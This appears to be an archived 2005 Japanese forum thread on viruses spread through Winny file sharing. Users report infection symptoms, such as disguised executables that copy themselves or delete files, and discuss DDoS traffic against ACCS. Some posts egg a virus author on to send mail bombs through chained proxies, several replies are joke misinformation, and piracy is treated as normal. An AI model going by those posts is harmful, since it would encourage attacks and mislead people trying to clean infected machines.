              ・゚・。・ ゚・。・゚・ 。・゚・
225[名無し]さん(bin+cue).rar:05/02/27 01:23:05 ID:Z6LiBI0d0
naoのこと時々でいいから思い出してあげてください
226[名無し]さん(bin+cue).rar:05/02/27 01:25:31 ID:6NQT1XB00
NaturalAnotherOne
227[名無し]さん(bin+cue).rar:05/02/27 01:53:10 ID:/Qp6bH6r0
失礼します。

【使用OS】WindowsXP HOME SP1
【WindowsUpdateしてるか】している
【使用AntiVirusソフト】ノートンアンチウィルス2004
【AntiVirusをUpdateしてるか】している
【ウイルススキャンの結果】検知せず
【オンラインスキャンしたなら結果】トレンドマイクロベースのオンラインチェックにて検出せず
【Winnyのバージョン】2.0b7.1
【Winny歴、総DL量】1年半 100GB
【テンプレを読んだか】事後に読みました。(踏んだのは今回が初)
【テンプレにある対策を実行したか】今回は全く無警戒でした。
【症状、具体的に分かる限りすべて書く】実行後2時間近く経ちますが症状がありません。
【何をしたらそんなことになったのか】解凍したフォルダ内に存在していた偽装フォルダをダブルクリック。
【これまでにとった措置】
まず、起動していたプロセスを強制終了。次にウィルスチェックをかける。
ここで検出されなかったため、オンラインスキャンを実行。またも検出されず。
このスレッドに書いてあった症例に習い、同じような症状が無いか点検してみるも、合致するものが無し。
あとはもう一度問題のファイルを開いて、プロセスの中身を調べてみれば手がかりはあるんでしょうけど、
その勇気がないというか、踏ん切りがつかず。結局何の変化も認められないので、戸惑うばかりです。
ファイルの作成日が2001年1月1日 0:00:00という点から、何らかの愉快犯的ウィルスだと思われるのですが…。
ああ、寝ようと思った矢先に不用意な事をしました。。反省してます。どなたか、助言いただけないでしょうか。
228[名無し]さん(bin+cue).rar:05/02/27 02:15:04 ID:/Qp6bH6r0
進展がありました。
自身のコピーを作成してはいないかと思い、
元ファイルのデータ容量を手がかりに検索してみたところ、
見事にヒットしました。
問題のファイルはノートンアンチウィルスのフォルダ内、
数列で名称表記されたEXEファイルの一つとして紛れていました。
で、これは自分の見落としがあるな、と思い、スタートアップ項目をチェックしたところ、
シマンテックの起動ファイルだと思い一時的にスルーしていたものの中に同名の値を発見。
直ちに削除しました。
とりあえず、ウィルスは根絶できそうです。
どこかに伏兵が潜んでいなければですが(汗

このような挙動を取るウィルスに関して、
何かご存知の人いましたら情報をください。
お願いします。
229[名無し]さん(bin+cue).rar:05/02/27 02:17:15 ID:MmaYBfLy0
アンチウイルスで検出できない新種ならば、ファイル名・ハッシュ書いてくれ
230ひみつの文字列さん:2024/12/23(月) 19:51:56 ID:MarkedRes
日本国またはアメリカ合衆国、もしくはその両方の著作権法に触れる内容であると疑われることから表示できません。
231[名無し]さん(bin+cue).rar:05/02/27 02:28:21 ID:/Qp6bH6r0
あ、もちろん一度解凍処理を行わせて、ですが。
exeかどうかを名前で判断しようとすると、自分は多分忘れるので(汗)
なるべく行動ルーチンの段階で予防しようと思ったんですが。。

眠気が最大の敵ですね。ほんとに。
もう眠気なんてぶっとびましたけど。
ダラダラ長く書き込みました。スイマセン。
232[名無し]さん(bin+cue).rar:05/02/27 02:38:39 ID:/Qp6bH6r0
また見つけましたorz
今度はヤフーメッセのフォルダに紛れている奴です。
フォルダが開かないと思って二度ほどダブルクリックしたんですが、
どうやらランダムで滞在先の見つかったフォルダに自分をコピーしていた模様。
どういう挙動をするプログラムなのか分からないんですが、
タスクの予約状況など見ながら恐る恐る対処する方針です・・ガクガク
233[名無し]さん(bin+cue).rar:05/02/27 02:49:28 ID:3CQfSD380
>>232
いまそうやって書き込んでるマシンは、もちろん感染してない別の
マシンだよな? 挙動不明のウイルスが活動してるマシンでオンラ
インにしてるかと思うと、読んでるこっちがガクブルするんだが。
234[名無し]さん(bin+cue).rar:05/02/27 03:56:24 ID:E5T6Ev6+0
>>232 少しおちつけよな!

http://tmp4.2ch.net/test/read.cgi/download/1108710633/
911 :[名無し]さん(bin+cue).rar:05/02/27 01:10:31 ID:/Qp6bH6r0
(シングル) トップをねらえ2! OP - ROUND TABLE Featuring Nino - Groovin’Magic (192k).exe

というエグゼファイルを誤ってダブルクリックしてしまったんですが、
ウィルスチェックには無反応で、キンタマかと思い諸所の例にならって検索してみたんですが、
それらしい痕跡も何も無いんです。
ただ、複数同時に起動する事が可能らしく、プロセスにも表示されます。
ただ、何をするのが目的のウィルスなのかが不明で。
これに関して何かご存知の方いませんか?
235[名無し]さん(bin+cue).rar:05/02/27 05:27:44 ID:EI0DLtw00
なまじ知識あると未知のウィルスの感染による被害や駆除法であれこれ頭が混乱して
偉い動揺してまうって感じか
236[名無し]さん(bin+cue).rar:05/02/27 16:10:02 ID:l/4ELDa20
新種ならノートンとバスターに提出しておいてください
237[名無し]さん(bin+cue).rar:05/02/27 17:20:29 ID:9BFlI8Fj0
アホばっか
238[名無し]さん(bin+cue).rar:05/02/27 17:35:11 ID:Fo51ZuBY0
A列車4実行したら

BOOTSTRAP
ボタン「実行します」

って出たんだけどコレってウイルス?
239[名無し]さん(bin+cue).rar:05/02/27 17:38:58 ID:aXtYIsZk0
心配するな。
手遅れだ。
240[名無し]さん(bin+cue).rar:05/02/27 17:40:26 ID:Fo51ZuBY0
ガボーン
241[名無し]さん(bin+cue).rar:05/02/27 17:51:56 ID:lKrlsq8E0
ガボーンという擬音には心なしかセンスを感じるな。
242[名無し]さん(bin+cue).rar:05/02/27 17:52:03 ID:v7TV2IPs0
XP標準搭載のマカフィーでスキャンする場合ぬるぽって検出されますか?
243[名無し]さん(bin+cue).rar:05/02/27 18:16:07 ID:ItGiHoLw0
最近のXPにはマカフィーが標準搭載なのか。そうなのか。
244[名無し]さん(bin+cue).rar:05/02/27 20:06:18 ID:/Qp6bH6r0
なんかここの人って何の役にも立ってくれませんね…。
とりあえず自己解決したので報告だけしておきます。
お邪魔しました。
245[名無し]さん(bin+cue).rar:05/02/27 20:11:29 ID:aXtYIsZk0
よかったな。
246[名無し]さん(bin+cue).rar:05/02/27 20:12:36 ID:XnhvOGFS0
解決できたのか
このスレさまさまだな
247[名無し]さん(bin+cue).rar:05/02/27 20:14:38 ID:did3p52+0
匿名掲示板のこんな板にあるスレなのに
相談すればなんでも教えてくれるのがあたりまえと思ってる
>244はなかなか愉快な子だなと思った
248[名無し]さん(bin+cue).rar:05/02/27 20:17:45 ID:/Qp6bH6r0
まあ、さしずめここは石っころの集まりってとこだよね。
ロクでも無いとこに相談したんだと、今振り返ると恥ずかしいよ。
我ながら、かなりテンパってたっぽい。
249[名無し]さん(bin+cue).rar:05/02/27 20:19:21 ID:eyH4mB5X0
>>248
何の役にも立たなくてごめんね。
でもお前は役に立たないどころか見てて不快だよ。
250[名無し]さん(bin+cue).rar:05/02/27 20:20:58 ID:iI3mTeYD0
>>247に同意。
生じたトラブルを自己責任で解決することができないなら端からnyなんて使うなということ。
独り善がりの文章で他人に情報提供する意図が無いようでは、誰も読まないしレスもつかない。
251[名無し]さん(bin+cue).rar:05/02/27 20:24:39 ID:/Qp6bH6r0
ムキになって反論しちゃって大変ですね^^;
252[名無し]さん(bin+cue).rar:05/02/27 20:33:05 ID:0+/kvrSY0
ID:/Qp6bH6r0はただの池沼じゃなくて、244以降はハクられて踏み台にされてるって話なら面白いんだけど...
やっぱただの池沼だな。つまらん。
253[名無し]さん(bin+cue).rar:05/02/27 20:56:51 ID:aXtYIsZk0
詳細な報告したのに相手にされない上にマルチまで晒されたからって、
それをここで晴らすのは大人げないな。その憤りはウイルス作者に向
けられるもんだろうし、自分にも非があったって書いてたじゃないか。

自己解決したならその手法を報告することで、これ以降の被害者を救
うことにも繋がるし、このスレ的にも建設的な方向に進むと思わない
か?
254[名無し]さん(bin+cue).rar:05/02/27 21:50:01 ID:Pn4UrFW60
釣りのAA誰も貼らないでやんの(・ε・) チェッ
255[名無し]さん(bin+cue).rar:05/02/27 21:54:58 ID:/GFJOuVB0
それさえもバカバカしぃ、ってことよ。
256[名無し]さん(bin+cue).rar:05/02/27 22:01:27 ID:aXtYIsZk0
まじめに反応した俺がバカみたいじゃん。(´・ω・`)
257[名無し]さん(bin+cue).rar:05/02/27 22:22:20 ID:6NQT1XB00
>>256
曇舞
258[名無し]さん(bin+cue).rar:05/02/27 23:53:38 ID:JPVM9sXe0



―――――――――ここまでテンプレ――――――――――




259[名無し]さん(bin+cue).rar:05/02/28 00:18:53 ID:uUFN2kMF0
【使用OS】 windows95
【WindowsUpdateしてるか】 してない
【使用AntiVirusソフト】 持って無い
【AntiVirusをUpdateしてるか】 当然してない
【ウイルススキャンの結果】 だからしてない
【オンラインスキャンしたなら結果】 かからない
【Winnyのバージョン】 2
【Winny歴、総DL量】 2年
【テンプレを読んだか】 読んだ
【テンプレにある対策を実行したか】 した
【症状、具体的に分かる限りすべて書く】 なんか動作が重い
【何をしたらそんなことになったのか】 画像の圧縮ファイルだと思ったらEXEだった
【これまでにとった措置】 とりあえずスタートアップ大幅規制 あとは放置

どうすればいいんですか
260[名無し]さん(bin+cue).rar:05/02/28 00:20:44 ID:jrxjXTzq0
windows95でWinny?
261[名無し]さん(bin+cue).rar:05/02/28 00:25:45 ID:rXkB+SU40
【使用AntiVirusソフト】 持って無い
【AntiVirusをUpdateしてるか】 当然してない
【ウイルススキャンの結果】 だからしてない

その開き直り具合はあっぱれだな。

【テンプレにある対策を実行したか】 した

ただし、ウソはいかんよ。
262[名無し]さん(bin+cue).rar:05/02/28 01:53:41 ID:fqh/3PsZ0
>>259
爆破。
263[名無し]さん(bin+cue).rar:05/02/28 02:22:27 ID:L9fMykG90
亀仙人のジッちゃんがどうのこうのって内容のtxtファイルが
同梱されてくるやつってantinyの亜種?新種?
割と見かけるけどテンプレの「流行種」には含まれてないみたいなんだが。
264[名無し]さん(bin+cue).rar:05/02/28 04:43:52 ID:fi2vtcGi0
前スレの偽装解除.bat踏んだ者だが、新たに症状発見。
adobe関連のソフトがごっそり削除されてる。
以上報告でした。
265[名無し]さん(bin+cue).rar:05/02/28 05:05:41 ID:o4kwqlCB0
落としたPhotoshopあぼーん
266[名無し]さん(bin+cue).rar:05/02/28 06:35:26 ID:ezk6be6V0
ゲームファイルでbinとcueとかを
デーモンツールでシフト押しで自動実行しないで開いた
その中のinstaller.exeはウイルススキャン以外何か必要?
267[名無し]さん(bin+cue).rar:05/02/28 06:52:43 ID:hSeeR9Vc0
>>264
俺も偽装解除.batを踏んだけど、同じくアクロバットが消えていたよ。
それ以外にもB's RecorderとCanonのプリンタ付属ソフト、アルバムソフトが消えていた。
どうやらC:\Program Filesのアルファベット順から消されていったみたいだな。
268[名無し]さん(bin+cue).rar:05/02/28 08:13:28 ID:DDT//won0
nyやってるとFWのアタックのログが結構ある
269[名無し]さん(bin+cue).rar:05/02/28 09:07:31 ID:4RiRy/vi0
アホばっか
270[名無し]さん(bin+cue).rar:05/02/28 10:34:20 ID:DNd3J6z40
【使用OS】 windowsXP Pro
【WindowsUpdateしてるか】 してない
【使用AntiVirusソフト】 AVG eTrust
【AntiVirusをUpdateしてるか】 二、三日に一回はチェックしてる
【ウイルススキャンの結果】 antiny.jとantinny検出
【オンラインスキャンしたなら結果】 ↑をした後、菌入り圧縮ファイルを削除したら何も検出されず
【Winnyのバージョン】 2
【Winny歴、総DL量】 4年
【テンプレを読んだか】 読んだ
【テンプレにある対策を実行したか】 した
【症状、具体的に分かる限りすべて書く】 特にない
【何をしたらそんなことになったのか】 菌入り圧縮ファイルをキャッシュから変換後
意味不明の文字列とファイル名が入ったボップアップが出現
詳細は覚えていない。eTrustが反応したのかなと思ってeTrustを誤動作させてみたけど
eTrustの反応とは違ったので何か不明
【これまでにとった措置】 菌入りファイルを削除、まとめサイト読んで対策→特に何も見つからず

自分が感染しているのかしていないのかが不安です
何でもいいんで心当たりとかあったら助かります
再インスコは最後の手段にしたい
271[名無し]さん(bin+cue).rar:05/02/28 10:38:04 ID:jwkU+31O0
272[名無し]さん(bin+cue).rar:05/02/28 10:57:04 ID:TGotIM3+0
>>270
ポップアップが出たのに詳細を覚えていないってのは痛い。
ワクチンログにしろウイルス活動にしろ、そこから解決の糸口を
見つけることができるかもしれんのに。

AVGのログにそれらしき形跡が残ってないかチェックしろ。
新規インスコは最後の手段だが、最も効果的な手段でもあるから
ためらいも捨てろ。
273[名無し]さん(bin+cue).rar:05/02/28 12:18:00 ID:MpI3s33j0
4年もnyやってるなら、
感染した時の状況は冷静に確認してほしいもんだ
274[名無し]さん(bin+cue).rar:05/02/28 13:13:37 ID:zCLmJwDk0
総DL量ってみんな偽ってないか?
500Gとか1Tとか、いると思うんだが・・・
275[名無し]さん(bin+cue).rar:05/02/28 13:41:11 ID:lNSV3DYE0
【使用OS】 windows2000 SP4
【WindowsUpdateしてるか】 した
【使用AntiVirusソフト】 Mcafee VirusScan
【AntiVirusをUpdateしてるか】 最新にアップデート済み
【ウイルススキャンの結果】 検出されず
【オンラインスキャンしたなら結果】
【Winnyのバージョン】 なし
【Winny歴、総DL量】 なし
【テンプレを読んだか】 読了
【テンプレにある対策を実行したか】 一応チェックしてみた
【症状、具体的に分かる限りすべて書く】 女性の画像が表示→マイドキュメント削除
【何をしたらそんなことになったのか】 ボボボーボボーボボを騙ったzipファイル内に、フォルダ偽装したexeがあったのでそれを実行
【これまでにとった措置】ウィルスチェック、スパム系のチェックレジストリ、スタートアップの確認、その他報告されているフォルダのチェック。

当方winnyをやってないけど、ジャンプ速報スレで妙に釣れてたんでキンタマ関連を実行するとどうなるのか興味があったので、試しにテスト機で実行してみた。
ヘルプというより報告でつ。テンプレにあるのと微妙に違う動きだったので。

実行すると、女性の画像が表示されて、しばらくタスクマネージャが起動不能。しばらくすると起動できるようになるが、マイドキュメントの内容が削除され、別のフォルダに割り当てられていた。
ウィルスチェックしてみるも該当なし。
スタートアップ変化なし。レジストリの例のRunの下、変化なし。C:\Winnt\bugfixは空っぽ。c:\winntに妖しげなファイルはなし。

そんなわけであまり面白くない結果になった。今後どうなるか気になるので、放置してる。何か変化があったらまた報告しまつ。
276[名無し]さん(bin+cue).rar:05/02/28 13:44:13 ID:6F23n9FQ0
人柱乙
277[名無し]さん(bin+cue).rar:05/02/28 16:31:00 ID:uUFN2kMF0
ここって結局どういうスレなの?
278[名無し]さん(bin+cue).rar:05/02/28 16:32:06 ID:KUNL6Adh0
作者が見てニヤニヤするスレ
279[名無し]さん(bin+cue).rar:05/02/28 16:35:27 ID:uUFN2kMF0
>>278
あ、なるほど。
なんか質問テンプレとかあってもロクなレスがついて無いし、
どうも変なスレだなーと思ってたけど、そういう事だったのね。
レス付けてる人が初心者に毛が生えた程度だなって感じがしたのは、
皆さんそういう感じで適当に答えていたからだったのか。
280[名無し]さん(bin+cue).rar:05/02/28 16:44:40 ID:uUFN2kMF0
あ、ちなみに259で試しにレスしてみてます。
もちろんネタですが(笑)
なんか、皆さん答え安い質問に、初心者でも分かるような解答しか寄せてないですもんね。
あれはワーム等の対策としてこのスレを立てたわけじゃなくて、
引っかかって困ってる人を見てニヤニヤするのが目的で立てたから、だったんですね。
マジこのスレ面白いです(笑)
281[名無し]さん(bin+cue).rar:05/02/28 17:17:47 ID:p1pWpAQr0
ゴット級マダァ?
282[名無し]さん(bin+cue).rar:05/02/28 17:41:05 ID:DoLuhWl20
とっとと新しいやつ流せよ糞作者
283[名無し]さん(bin+cue).rar:05/02/28 17:43:14 ID:chmnL/LJ0
>>270
キャッシュから変換しただけだったら大丈夫なんじゃないかな?
284[名無し]さん(bin+cue).rar:05/02/28 19:03:31 ID:OfHKo/h9O
スレタイを見ればわかるように、ここはウィルスの情報を挙げるスレであって
対策法を教えるスレではないのだから、誰もマトモに答えてないだけだろ。
285[名無し]さん(bin+cue).rar:05/02/28 19:30:54 ID:3/zWeRnZ0

ACCS、DDoS攻撃への対策でIPアドレスの記録を開始
http://www.rbbtoday.com/news/20050228/21264.html

コンピュータソフトウェア著作権協会(ACCS)は、DDoS攻撃への対策として
3月からwww.accsjp.or.jpにアクセスしたIPアドレスを記録すると発表した。

 ACCSは、1月21日に公式サイトのWebサーバをwww.accsjp.or.jpからwww2.accsjp.or.jpに変更している。
これは、www.accsjp.or.jpに大量のパケットを投げる「Antinny」などのウイルスに
感染したコンピュータからのDDoS攻撃を防ぐために行われたものだ。

そのため、現時点でwww.accsjp.or.jpにアクセスするIPアドレスは、
Antinnyなど不正なソフトウェアが実行されていると判断。

過度のアクセスがあるIPアドレスを記録し、該当するISPなどを通じてユーザに注意を促す。
286[名無し]さん(bin+cue).rar:05/02/28 19:36:37 ID:K+G5QbvB0
注意されて気づく感染
287[名無し]さん(bin+cue).rar:05/02/28 19:41:22 ID:uUFN2kMF0
>>284
それ、認識間違ってますよ。
スレタイ・テンプレをまともに受け止めればそうはならないハズ。
逆にこのスレの真の意味(感染者を見てニヤニヤ)を知っていれば、
なお当然できない認識なんですが。
自分ルールで都合のいい解釈をしないでくださいね。
(・∀・)ニヤニヤ
288[名無し]さん(bin+cue).rar:05/02/28 19:47:26 ID:sIoDLBPg0
僕らはいつも疑心暗鬼
289[名無し]さん(bin+cue).rar:05/02/28 19:58:42 ID:PbPgdHfm0
>>285
つーか、今まで記録してなかったのか!
290[名無し]さん(bin+cue).rar:05/02/28 20:03:12 ID:IPMOGUsr0
>>285
http://www.google.com/search?q=accs
http://search.goo.ne.jp/web.jsp?MT=accs
http://www.infoseek.co.jp/ITitles?qt=accs

www2なんて検索にかからないし、

> www.accsjp.or.jp にリンクするページの検索結果 約 345 件
http://www.google.com/search?q=link%3Awww.accsjp.or.jp
> link:www2.accsjp.or.jpに該当するページが見つかりませんでした。
http://www.google.com/search?q=link%3Awww2.accsjp.or.jp

……。
291[名無し]さん(bin+cue).rar:05/02/28 21:48:26 ID:4RiRy/vi0
アホばっか
292[名無し]さん(bin+cue).rar:05/02/28 22:01:50 ID:9ZSe56+l0
Antinnyなどとは言うが、元祖Antinnyはパケット出さないのにね
メール砲搭載してるのは、キンタマだというのに。


ACCSなど不正な団体へのアクセスに十分注意するように勧告した
293[名無し]さん(bin+cue).rar:05/02/28 22:02:34 ID:ApCSWftt0
オランゲランゲ
294[名無し]さん(bin+cue).rar:05/02/28 22:05:07 ID:9ZSe56+l0
作者の方は、海外串多段でメール砲打つような仕組みを取り入れてくれ。

と煽ってみるテスト
295[名無し]さん(bin+cue).rar:05/02/28 23:09:35 ID:yCjJ0dG/0
ああ、人工頭脳学な症候群あたりで有効な串リストを自動更新するとかな。
296[名無し]さん(bin+cue).rar:05/03/01 01:38:14 ID:cIb/5VpG0
アホばっか
297[名無し]さん(bin+cue).rar:05/03/01 01:39:45 ID:Appkzg2r0
なんだよ人工頭脳学な症候群って。
頭オカシくない?
298[名無し]さん(bin+cue).rar:05/03/01 01:46:17 ID:7KxuPDYd0
cybersyndrome
299[名無し]さん(bin+cue).rar:05/03/01 01:48:05 ID:Appkzg2r0
人工頭脳学はサイバネティックだろ。
単に頭が悪いだけのアホかよ、ツマンネ。
300[名無し]さん(bin+cue).rar:05/03/01 01:53:55 ID:AJb+GLCk0
cyberは「最新の」だな。
301[名無し]さん(bin+cue).rar:05/03/01 02:54:00 ID:7KxuPDYd0
「症候群、串リスト」とくればcybersyndromeだと思ったが、人工頭脳は知らん。
302[名無し]さん(bin+cue).rar:05/03/01 03:11:24 ID:gmrPuyog0
ニュイルス作者を刺激するのはやめてください
303[名無し]さん(bin+cue).rar:05/03/01 03:27:18 ID:zKb0zB7V0
それではニャームの作者を刺激するとしよう
304[名無し]さん(bin+cue).rar:05/03/01 09:33:27 ID:AJb+GLCk0
ニョロイは?
305[名無し]さん(bin+cue).rar:05/03/01 10:26:31 ID:7KxuPDYd0
ニャニュニョの分類基準がわからん
306[名無し]さん(bin+cue).rar:05/03/01 10:53:02 ID:VTT2pFmW0
ただの語感。
307[名無し]さん(bin+cue).rar:05/03/01 11:01:24 ID:JDPmBHJc0
ア行→ニャ 例:ワーム
ウ行→ニュ 例:ウイルス
オ行→ニョ 例:トロイ

俺は使いやすいニャックドアが出回ってくれるとおもしろいかなーとか。
308[名無し]さん(bin+cue).rar:05/03/01 11:43:54 ID:VTT2pFmW0
じゃ、みんなひっくるめてニャルウェアってことで。(w
309[名無し]さん(bin+cue).rar:05/03/01 11:58:11 ID:yfaWdQ6b0
ニョロイのニョク馬



どうでもいいが「にょろ」で検索すると「〜」が出てきてビビッた
310309:05/03/01 11:58:45 ID:yfaWdQ6b0
変換の間違いです
311[名無し]さん(bin+cue).rar:05/03/01 12:00:37 ID:7G9uJbR40
にょろを変換すると〜になるのって誰が始めたんだろうなあ。
へびっぽいからだろうか。
312[名無し]さん(bin+cue).rar:05/03/01 12:02:58 ID:7KxuPDYd0
イヤソウジャナクテ
ニャームとニョロイの違いを・・・
313[名無し]さん(bin+cue).rar:05/03/01 18:24:58 ID:cE4lsf/I0
ニョートンニャンチニュイルス
314[名無し]さん(bin+cue).rar:05/03/01 18:29:25 ID:QMjgz7VI0
ついかっとなってwww.ac●sjp.or.jpにアクセスしてみた

〜〜〜〜何もない〜〜〜〜
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<HTML><HEAD>
<META http-equiv=Content-Type content="text/html; charset=shift_jis"></HEAD>
<BODY></BODY></HTML>

www2への臨時移転案内ぐらい入れないのかね?>ここを見てるAC●Sの諸君!
これじゃただのフィッシングサイトだろーが
315[名無し]さん(bin+cue).rar:05/03/01 19:03:29 ID:tfP5iGTX0
そいえばaccsにアタック多いのでウンヌン言ってたが、単にツーホーcgiを
動かせば、何度も何度もアクセスするわけではないし、そのメアドに「ニュイ
ルスチェク汁」と返信すればいいだけの気がするのだが、なぜわざわざ
アタック食らうような真似するかね?

久保がうちは攻撃されている被害者だと言いたいだけかヽ(´ー`)ノ
316定期レス:05/03/01 20:42:15 ID:3o2b60tq0
アホばっか
317[名無し]さん(bin+cue).rar:05/03/01 21:33:14 ID:ODP+PiIxO
WINDOWS2000を使っているものですが、ウイニーを二ヶ月前くらいからやりだしたので不安に思い、ウイルスバスター2005でウイルス検索しようとしたらすぐにウィンドウが勝手に閉じてしまいます。
いつも落とすときはリアルタイム検索設定をしていたと思います。これってウイルスでしょうか?
318317:05/03/01 21:37:40 ID:ODP+PiIxO
携帯で見てたので1しか読んでいませんでした。すみません。とりあえずウインウズアップデートとウイルスバスターは最新版です。FWはウイルスバスターのを切っていました。
319[名無し]さん(bin+cue).rar:05/03/01 21:41:40 ID:ZZMzpnEL0
トリガーキター
320[名無し]さん(bin+cue).rar:05/03/01 21:59:41 ID:8Bzv7MZM0
>>315
ACCSにe-mailを送っているわけではない。
321[名無し]さん(bin+cue).rar:05/03/01 22:08:28 ID:Appkzg2r0
>>320
ツッコんじゃ悪いよ。
最近このスレってああいうのばっかりなんだから…。
322317:05/03/01 22:10:21 ID:ODP+PiIxO
お願いします
323[名無し]さん(bin+cue).rar:05/03/01 22:28:05 ID:UlVA7uur0
ハナハルさんの作品集というファイルを削除しょうとしたら、
explorer.exeがエラー終了してしまいます。情報を見ると、
C:\DOCUME~1\Owner\LOCALS~1\Temp\f7af_appcompat.txt
とあったので、キャッシュと履歴をクリアーしましたが、直りません。
これはウイルスなのでしょうか?
どうか対策方法を教えてください。お願いします。
324[名無し]さん(bin+cue).rar:05/03/01 22:47:28 ID:IXton0Jm0
ニュイルスの方が釣り人多いな
325[名無し]さん(bin+cue).rar:05/03/01 23:09:20 ID:g8YYlyQs0
【1読め】スレ立てるまでも無い質問何でも来いPart17
http://tmp4.2ch.net/test/read.cgi/download/1108389964/
Winny総合質問38
http://tmp4.2ch.net/test/read.cgi/download/1109485488/

このスレで質問しなくていいから
326[名無し]さん(bin+cue).rar:05/03/02 00:26:42 ID:JRuuqAbn0
アホばっか
327[名無し]さん(bin+cue).rar:05/03/02 00:30:40 ID:6EmKZDYp0
欄検眼段なんだけど害はあるの?
328[名無し]さん(bin+cue).rar:05/03/02 01:11:45 ID:RNbH8yhs0
おやおや、今度はウイルス本体様のお出ましだ。コンニチハ!
329[名無し]さん(bin+cue).rar:05/03/02 02:41:36 ID:rHTt8K//0
イベントでみたら
Windows Installer (Nullpo) となってました。
なんのウィルスですか?
330[名無し]さん(bin+cue).rar:05/03/02 07:03:35 ID:1oPzK7ls0
パソコンのウィルスです
331長文:05/03/02 08:20:45 ID:+IoPy++70
オイラのPCには2.0対応のUSB口が4っつあるんだが、どの口にUSB2.0対応の製
品をつなげても、不明のデバイスですって事で認識されなくなった。2.0対応の
4ポートハブ、USBフッラシュメモリ、USB外付けハードディスクなども全部、
タスクマネージャなどをいじったりしてもなおらなかった。ちょっと前に、
Winnyやってたのでニュイルスか?と思い、再インストールすることに、でも
PCに残ってる40Gぐらいのデータ物を移す物がない・・・。外付けHDDも使え
ないし、しかし思わぬことに、USB1.0のみの対応したハブや、メモリとかは
認識し使えることが判明、また1.0のハブにその2.0外付けHDDをつなげると、な
ぜか使えることも判明,でも転送速度は1.0だけど、そのため40G移すのに
11時間もかかった。でPCのHDDを初期化OS再インストールし、再び2.0対応
製品をつなげたら、それでも認識されなかった・・・。ショックでもうPCを
買い換えるかなと考えたけど、とりあえずケースを開けて、マザーにつなが
ってるUSB口をちょっとふいたり、全体的にもっさりほこりがついてたので、
内輪ではたいたり、吹いたりして取り除いた。でもう一度、駄目もとでやっ
つなげたら、今度は、2.0対応がちゃんと認識した、おお!こんな物理的
なやり方で回復するとは・・、原因がよくわからなかった。
332[名無し]さん(bin+cue).rar:05/03/02 08:46:02 ID:vsLKZD0a0
( ´,_ゝ`)プッ
333[名無し]さん(bin+cue).rar:05/03/02 10:01:08 ID:RNbH8yhs0
>>331
HDDと本体のデフラグ乙
334[名無し]さん(bin+cue).rar:05/03/02 12:34:00 ID:g+zL7/rU0
test
335[名無し]さん(bin+cue).rar:05/03/02 13:11:34 ID:NH9DiMUp0
ZIPを解凍したらWin32/Parite.Aというウィルスが出てきたんですが
これって解凍しただけで感染することはあるんですか?
336[名無し]さん(bin+cue).rar:05/03/02 13:14:02 ID:LTHp8zzE0
>>1旧型お断り
337[名無し]さん(bin+cue).rar:05/03/02 13:15:16 ID:nK/+ZZYh0
338335:05/03/02 13:36:09 ID:NH9DiMUp0
とりあえず大丈夫ってことですか?連投すいません
339[名無し]さん(bin+cue).rar:05/03/02 13:41:11 ID:CUX+YqQK0
>331
「中だしwwwだめぽwwwwwwwwwwwwwww」まで読んだ
340[名無し]さん(bin+cue).rar:05/03/02 17:43:26 ID:rr3stMW50
>>331
ってのは、ウイルスなの?
341[名無し]さん(bin+cue).rar:05/03/02 18:34:24 ID:JRuuqAbn0
アホばっか
342[名無し]さん(bin+cue).rar:05/03/02 19:05:04 ID:VkvYou/60
マホメット
343[名無し]さん(bin+cue).rar:05/03/02 19:09:04 ID:8k+NOnlc0
マスカット
344[名無し]さん(bin+cue).rar:05/03/02 19:23:48 ID:PKueFU8N0

なんかWinnyやってダウンしたもの
を整理してるんですが、
なんかハードディスクの書き込み音がガガガガ鳴ってます。
345[名無し]さん(bin+cue).rar:05/03/02 19:28:08 ID:fF6AQ/Da0
好きなだけ鳴らせばええがな
346[名無し]さん(bin+cue).rar:05/03/02 19:45:15 ID:2rD/sbmr0
ガガガ
347[名無し]さん(bin+cue).rar:05/03/02 19:46:34 ID:8k+NOnlc0
OK、ブラクラゲット。
          ∧_∧
    ∧_∧  (´<_`  ) 流石だよな俺ら。
   ( ´_ゝ`) /   ⌒i
   /   \     | |
  /    / ̄ ̄ ̄ ̄/ |
__(__ニつ/  FMV  / .| .|____
    \/____/ (u ⊃
      ガガガガ・・・・


348[名無し]さん(bin+cue).rar:05/03/02 20:14:30 ID:PKueFU8N0
マイクロソフトの
Windowsの更新でした。^^;
349[名無し]さん(bin+cue).rar:05/03/02 20:25:29 ID:NvNoST+60
自動更新なんか切れ。
350[名無し]さん(bin+cue).rar:05/03/02 22:07:24 ID:SEBcRYMJ0
なにこのネタスレ
351[名無し]さん(bin+cue).rar:05/03/02 23:48:05 ID:U2Qf+mUc0
mellpo.exeって結局何がしたかったんだろう・・・
勝手に強制終了してしまったのだが・・・
352[名無し]さん(bin+cue).rar:05/03/02 23:52:15 ID:LTHp8zzE0
ふむふむ、アプリケーションエラーのダイアログで偽装すれば
感染者は油断するのか
353[名無し]さん(bin+cue).rar:05/03/02 23:57:55 ID:MatlkmCm0
ワラタ

そういえば解凍エラーのダイアログなんてのもあったな
354[名無し]さん(bin+cue).rar:05/03/03 00:06:34 ID:LnrAOobfO
最近携帯の電池がすぐになくなるんですけど、やっぱりこれもニュイルスのせいですか?
355[名無し]さん(bin+cue).rar:05/03/03 00:24:22 ID:y3GbhbOu0
>>354
YES
356[名無し]さん(bin+cue).rar:05/03/03 00:27:53 ID:zNPNKRf20
俺は携帯用ノートン入れてるから大丈夫
357[名無し]さん(bin+cue).rar:05/03/03 00:29:46 ID:orj/7tKy0
俺携帯もってないから大丈夫
358[名無し]さん(bin+cue).rar:05/03/03 01:02:02 ID:2XNHbMCC0
>>357
おまいは俺か?
359[名無し]さん(bin+cue).rar:05/03/03 02:22:45 ID:SCtcXdg10
モッテテモカカッテコナイ('A`)
360[名無し]さん(bin+cue).rar:05/03/03 06:39:30 ID:BH0GkgyF0
ネタ(新規ニュイルス)が投入されない以上は、ネタスレと化しても仕方なし。
ま、マターリといきましょうや
361[名無し]さん(bin+cue).rar:05/03/03 13:20:51 ID:8qKRcU990
kakikomi.txtをうpするキンタマまだかな
362[名無し]さん(bin+cue).rar:05/03/03 14:04:54 ID:la9PSfC30
モッテテモカケラレナイ('A`)
363[名無し]さん(bin+cue).rar:05/03/03 14:58:00 ID:PT1E/IUP0
ニュイルスを変換すると乳井留守になるんですけどこれもニュイルスの所為ですか?
364[名無し]さん(bin+cue).rar:05/03/03 16:00:25 ID:M/DVFjXO0
>>363
